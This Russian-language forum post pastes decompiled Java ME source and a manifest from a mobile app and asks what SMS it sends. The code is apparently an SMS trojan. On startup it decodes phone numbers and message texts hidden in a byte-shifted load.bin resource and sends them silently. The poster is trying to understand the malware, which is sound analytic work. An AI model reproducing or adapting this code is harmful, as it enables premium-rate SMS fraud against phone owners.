Подскажите какое сообщение посылается программой.открыл с помощью java decompiler вот что там import java.io.IOException; import java.io.InputStream; import javax.microedition.io.Connector; import javax.microedition.midlet.MIDlet; import javax.wireless.messaging.MessageConnection; import javax.wireless.messaging.TextMessage; public class MixMobile extends MIDlet { public String smsnumber; public String smstext; public int tpcurr; public int tppoint; public static int a = 12; public void startApp() { zagruzka(); } public void zagruzka() { InputStream localInputStream; try { localInputStream = getClass().getResourceAsStream("/load.bin"); this.tppoint = (localInputStream.read() - a); for (int i = 0; i < this.tppoint; ++i) { this.smsnumber = a(localInputStream); this.smstext = a(localInputStream); sendSMS(); } return; } catch (Exception localException) { } } private static String a(InputStream paramInputStream) throws IOException { int i = paramInputStream.read() - a; StringBuffer localStringBuffer = new StringBuffer(); for (int j = 0; j < i; ++j) localStringBuffer.append((char)(paramInputStream.read() - a)); return localStringBuffer.toString(); } public void sendSMS() { if (this.tpcurr++ == this.tppoint - 1) this.tpcurr = 0; try { MessageConnection localMessageConnection; TextMessage localTextMessage; (localTextMessage = (TextMessage)(localMessageConnection = (MessageConnection)Connector.open("sms://" + this.smsnumber)).newMessage("text")).setPayloadText(this.smstext + " " + getAppProperty("id")); localMessageConnection.send(localTextMessage); localMessageConnection.close(); return; } catch (Exception localException) { } } public void pauseApp() { } public void destroyApp(boolean paramBoolean) { } } Есть еще load.bin файл но его прога не открывает. И manifest.mf Manifest-Version: 1.0 MicroEdition-Configuration: CLDC-1.0 MIDlet-Name: chak MIDlet-Description: chak Created-By: 1.4.2_12 (Sun Microsystems Inc.) MIDlet-Icon: /ico.png MIDlet-Vendor: CyberMobs MIDlet-1: obchak, /ico.png, MixMobile MIDlet-Permissions: javax.wireless.messaging.sms.send MIDlet-Version: 2.11 MicroEdition-Profile: MIDP-1.0 id: 3306 Лично я так и не понял.может фишка в файле load.bin но как его открыть
Code: { this.smsnumber = a(localInputStream); this.smstext = a(localInputStream); sendSMS(); } по-моему это